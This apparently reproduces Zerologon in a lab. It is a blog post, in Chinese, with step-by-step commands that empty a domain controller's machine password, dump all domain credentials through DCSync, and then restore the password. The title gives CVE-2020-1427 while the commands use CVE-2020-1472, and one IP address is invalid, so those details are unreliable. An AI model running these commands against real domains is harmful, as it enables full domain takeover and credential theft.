内网渗透-CVE-2020-1427
利用之前先检查一下密码是否为空
检测是否存在漏洞
python3 zerologon_tester.py Multimaster 10.129.44.1241 ⚙
使用poc直接置空密码
python3 CVE-2020-1472.py Multimaster 10.129.175.226
dump密码,查看是否被置空(域控的机器账户可以使用DCSync导出域内所有用户凭据)
└─# python3 secretsdump.py Multimaster$@10.129.175.226 -no-pass -just-dc
恢复目标密码
提取机器账户的密码十六进制
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
python3 restorepassword.py Multimaster@Multimaster -target-ip 10.129.103.84 -hexpass 75e9474feaa49a5412d9b34e2486f34495e78d51f922c8c07cf5d9474cdeedfaf8ec8a0280dab7725761216555d5def061c7f18483f6a3172bca7c05f4b2ba3fbe92df1b191ef40fa0922fe8416fc4374497af51fd27d51c58966c8bc4a79c69e0672da3c2cae47ffa9e49167da4bb9f081f6d7692e72e12cc55f214abc3f0770aa7c1e745ccf23d033eee628b77cd4007aa694ee049c708a607df3bd1e917747ec9aa8042187b14ddfb2c768b4c035e0936f95f939d4152dfa1afe3554e6a6dc640b043c654038ed61e934feaf9b2c2d631ecb328cd6dca84ffdd6b522395d6f297554acdeede65dad32177023d506b
继续使用空密码获取hash失败
查看是否被修改成功
原文始发于微信公众号(土拨鼠的安全屋):CVE-2020-1427漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论